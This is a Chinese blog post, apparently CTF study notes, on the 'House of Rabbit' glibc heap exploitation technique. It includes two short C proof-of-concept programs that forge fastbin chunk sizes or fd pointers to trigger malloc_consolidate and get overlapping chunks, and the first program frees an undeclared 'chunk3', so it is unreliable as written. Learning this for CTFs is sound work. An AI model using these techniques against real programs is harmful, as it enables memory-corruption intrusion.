House of Rabbit

最新推荐文章于 2024-08-19 16:33:29 发布
最新推荐文章于 2024-08-19 16:33:29 发布
阅读量601 收藏 7
点赞数 18
分类专栏: pwn 文章标签: pwn 堆入门 house of rabbit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yjh_fnu_ltn/article/details/141087077
版权

House of Rabbit

介绍:

  1. House of rabbit 是一种伪造堆块的技术,早在 2017 年已经提出,但在最近两个月才在 CTF 比赛中出现。我们一般运用在 fastbin attack 中,因为 unsorted bin 等其它的 bin 有更好的利用手段。

原理:

  1. 我们知道,fastbin 中会把相同的 size 的被释放的堆块用一个单向链表管理,分配的时候会检查 size 是否合理,如果不合理程序就会异常退出。而 house of rabbit 就利用了在 malloc consolidate 的时候 fastbin 中的堆块进行合并size 没有进行检查从而伪造一个假的堆块,为进一步的利用做准备。
  2. 利用条件:
    • 可以修改 fastbin 的 fd 指针或 size
    • 可以触发 malloc consolidate(merge top 或 malloc big chunk 等等)

POC1:

  1. modify the size of fastbin chunk:

    #include <stdlib.h>
#include <stdio.h>
#include <string.h>
int main(void)
{
    unsigned long* chunk1=malloc(0x40); //0x602000
    unsigned long* chunk2=malloc(0x40); //0x602050
    malloc(0x10);
    free(chunk1);
    free(chunk3);

    chunk1[-1]=0xa1; //modify chunk1 size to be 0xa1
    malloc(0x400);  //allocate a large chunk, trigger malloc_consolidate
    malloc(0x90); //申请到修改size后的chunk,并造成overlapping
    return 0;
}

    调试分析:先释放掉两个chunk

    image-20240809154606416

    修改chunk1的size字段:

    image-20240809154816163

    再分配一个较大的size,触发maloc_consolidate函数 (没有堆size进行检查),将fastbin整理到small bin中,将其直接放入到small bin中,后面申请chunk时就会造成overlapping:

    image-20240809154945736

POC2

  1. modify FD pointer:

    #include <stdlib.h>
#include <stdio.h>
#include <string.h>
int main(void)
{
    unsigned long* chunk1=malloc(0x40); //0x602000
    unsigned long* chunk2=malloc(0x100);//0x602050
    chunk2[1]=0x31; //fake chunk size 0x30
    chunk2[7]=0x21;  //fake chunk's next chunk
    chunk2[11]=0x21;//fake chunk's next chunk's next chuck
    free(chunk1);
    chunk1[0]=0x602060;// modify the fd of chunk1
    malloc(5000);// malloc a  big chunk to trigger malloc consolidate
    return 0;	
}

  2. 调试,修改前的堆:

    image-20240809164501958

    伪造fake_chunk,这里为什么size字段填1,可以看这篇文章伪造unsortedbin释放时 top chunk的衔接问题:这里甚至可以将fake_chunk_next的size字段给为0x11:

    image-20240809170745070

    faka_chunk_next的size字段给为0x11仍然可以通过检查:

    image-20240809171029205

    再分配一个较大的size,触发maloc_consolidate函数 (没有堆size进行检查),将fastbin整理到small bin中,将其直接放入到small bin中,后面申请chunk时就会造成overlapping:

    image-20240809170500710

总结

House of rabbit 的优点是容易构造 overlap chunk ,由于可以基于 fastbin attack,甚至不需要 leak 就可以完成攻击。

波克比QWQ
关注
专栏目录
对元学习的相关研究成果做一个总结和综述,以期为学术界提供更系统、全面、深入的认识 A Survey of MetaLearning Algorithms Survey Paper
AI天才研究院
08-05 795
2019年,机器学习领域蓬勃发展。深度学习和强化学习等新型的机器学习方法获得了巨大的成功。但是,在一些实际应用场景中仍然存在着一些挑战,例如数据不足、样本依赖和数据分布不均衡等。为了克服这些问题,在过去几年里,元学习(meta learning)等新型机器学习方法受到越来越多人的关注。元学习旨在解决深度学习中的样本依赖、偏差、样本不均衡、泛化能力不足等问题,通过利用少量的训练样本进行快速、有效的模型学习,从而取得良好的模型性能。
PWNHouse of Lore&House of Rabbit
u014377094的博客
05-04 3908
House of lore House of lore是一种利用small bin的利用方法。 前面我们通过修改unsorted bin与large bin的bk(bk_nextsize)位来造成对”任意“地址的更改。unsorted bin由于修改后,如果无法妥善处理bk指向的chunk的size位、bk位,会造成unsorted bin无法再使用,largebin由于是通过fd_nextsize来便利的,所以下次放入影响会小,而下次取出,假如可取出比修改的chunk小的chunk,还可以继续使用。以
溢出 House of EinherjarHouse of spiritHouse of romanHouse of orangeHouse of LoreHouse of Force
qq_69100706的博客
08-19 463
在CTF(Capture The Flag)竞赛中,溢出攻击常常涉及利用glibc管理器的各种漏洞和特性。"House of..."这一系列的技术名称来源于《Game of Thrones》中的贵族家族名,但在这里,它们指的是利用glibc管理中特定漏洞的不同方法。
[总结型]记CTF PWN中过气的利用
easy_level1的博客
04-15 1596
目录前言不再好用的unsorted bin attack不可能的tcache double free 前言 how2heap(https://github.com/shellphish/how2heap)可以说是目前"权威"的glibc中的heap exploitation techniques文档。在学术界近年的一些顶会文章也有引用这个github项目。 攻防对抗是一直持续发展的,很容易在学习中,复现一些过时的攻击技术出现困难,原因就是已经有补丁打上了。本文大致总结一些在比赛中常见的过时技术,持续更新…吧
Rabbit House- Google Kick Start 2021 Round A
Layomiiety的博客
03-24 266
Google Kick Start 2021 Round A: Rabbit House Barbara got really good grades in school last year, so her parents decided to gift her with a pet rabbit. She was so excited that she built a house for the rabbit, which can be seen as a 2D grid with R rows and
从零开始的Linux利用(十三)——风水
weixin_43044226的博客
06-25 1098
这一节主要包含两个部分,高版本下的House of Rabbit以及风水在House of Rabbit中学习到了House of Rabbit的利用方式,这种利用思路通过修改fastbin的fd指针、触发将fastbin放入到unsortedbin、进一步修改fake chunk的大小使chunk放入到largebin进而得到任意地址的写能力。但是这里有一个前提就是之前的glibc版本比较低(2.25)在glibc 2.27中的函数中增加了对fastbin的size的检查 可以看到在之前检查了
7-12 Rabbit (300 分)
qq_43885462的博客
05-06 153
As we all know, rabbits like to jump, and Rabbit Xuan is no exception. Rabbit Xuan have a very big house, which can be seen as an n×m 2D grid. There are several boxes on each grid, and the height of each box is one meter, so Rabbit Xuan can jump happily on
牛人谈论CVPR 2015 Deep down the rabbit hole: CVPR 2015 and beyond
GarfieldEr007的专栏
01-14 1903
Deep down the rabbit hole: CVPR 2015 and beyond CVPR is the premier Computer Vision conference, and it's fair to think of it as the Olympics of Computer Vision Research.This year it was held
foxandrabbit java_英语小故事---The Rabbit and the Fox(兔子与狐狸的较量)
weixin_34079307的博客
02-26 783
Once there was a very naughty rabbit. He liked to play tricks. And this made other beasts angry. But it was very difficult to catch him.One day a fox said to a wolf," Let's think of a way to catch the...
【CTF资料-0x0002】PWN简易Linux利用入门教程by arttnba3
arttnba3的博客
02-25 5811
【CTF资料-0x0002】简易Linux利用入门教程by arttnba3老生常谈,[GITHUB BLOG ADDR](https://archive.next.arttnba3.cn/2021/02/24/%E3%80%90CTF%E8%B5%84%E6%96%99-0x0002%E3%80%91%E7%AE%80%E6%98%93Linux%E5%A0%86%E5%88%A9%E7%94%A8%E5%85%A5%E9%97%A8%E6%95%99%E7%A8%8Bby%20arttnba3/),请
glibc2.23-glibc2.29的malloc.c的变化
For Geek
10-17 1547
pwn利用中 往往需要根据glibc的版本对exp进行一个改进 本人根据自身的需要对glibc2.23-glibc2.29在malloc.c在分配和回收策略上的变化进行一个记录 最主要的是记录报错信息 Glibc2.23 _int_malloc 从fastbin中分配fast chunk的时候 malloc的时候 会对fastbin->fd指向的chunk 验证一遍它是否在对应的fas...
paddle 56 将图像分类模型嵌入到目标检测中并实现端到端的部署(用图像分类模型进行目标检测切片分类)
a486259的博客
12-24 1431
目标检测在功能上一直是涵盖了图像分类的,其包含目标切片检测,目标切片分类。由于某些原因,需要将目标检测的功能退化为检测,忽略其切片分类,使用外部的分类模型。然而这样操作会使得其与原始的部署代码不兼容,为此博主实现将图像分类模型嵌入到目标检测中,并实现端到端的部署。这里以ppyoloe模型为改造案例,关于图像分类模型可以使用任意PaddleClas支持的模型。关于构造PaddleClas模型可以查阅。
【水果识别】基于matlab GUI形态学水果大小识别【含Matlab源码 920期】.md
10-15
CSDN Matlab武动乾坤上传的资料均有对应的代码,代码均可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博客文章底部QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 图像识别:表盘识别、车道线识别、车牌识别、答题卡识别、电器识别、跌倒检测、动物识别、发票识别、服装识别、汉字识别、红绿灯识别、火灾检测、疾病分类、交通标志牌识别、口罩识别、裂缝识别、目标跟踪、疲劳检测、身份证识别、人民币识别、数字字母识别、手势识别、树叶识别、水果分级、条形码识别、瑕疵检测、芯片识别、指纹识别
【瑕疵检测】基于matlab瓶盖瑕疵检测【含Matlab源码 730期】.md
10-15
CSDN Matlab武动乾坤上传的资料均有对应的代码,代码均可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博客文章底部QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 图像识别:表盘识别、车道线识别、车牌识别、答题卡识别、电器识别、跌倒检测、动物识别、发票识别、服装识别、汉字识别、红绿灯识别、火灾检测、疾病分类、交通标志牌识别、口罩识别、裂缝识别、目标跟踪、疲劳检测、身份证识别、人民币识别、数字字母识别、手势识别、树叶识别、水果分级、条形码识别、瑕疵检测、芯片识别、指纹识别
Shapely-1.6.4.post2-cp35-cp35m-win_amd64.whl
10-15
Shapely-1.6.4.post2-cp35-cp35m-win_amd64.whl
Apache Flink CEP复杂事件处理详解及实战案例
10-15
内容概要:本文详细介绍了Apache Flink的FlinkCEP模块,讲解了其安装配置、事件流处理基础及其应用场景,其中包括电商欺诈检测、网络监控、实时交易系统的模式匹配以及社交媒体趋势分析的具体实现。通过多个实战示例演示了如何利用正则表达式定义复杂模式并在大数据流中识别有用的事件序列,适用于需要从实时数据流中挖掘价值的多种场景。 适用人群:具备一定大数据处理经验的研发人员、架构师以及相关领域的研究人员和技术爱好者。 使用场景及目标:针对金融反欺诈、网络安全、高频交易、物联网数据分析等领域,实现复杂事件模式的实时监测和处理。 其他说明:本文提供了大量的实践代码样本,旨在引导读者掌握Flink CEP的实际应用技巧。
SSM+JSP在线网课管理系统答辩PPT.pptx
最新发布
10-15
计算机毕业设计答辩PPT
稳压罐sw16_三维3D设计图纸.zip
10-15
稳压罐sw16_三维3D设计图纸.zip
漏洞深入解析:House of Spirit与House of Lore
"这篇文档是关于漏洞分析的‘house系列’第一部分,主要讨论了House of Spirit和House of Lore两种技术。文章基于CentOS 6.10 32位系统,内核版本2.6.32,gcc 4.4.7,gdb 7.2和libc 2.12。作者提到了先前关于glibc...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值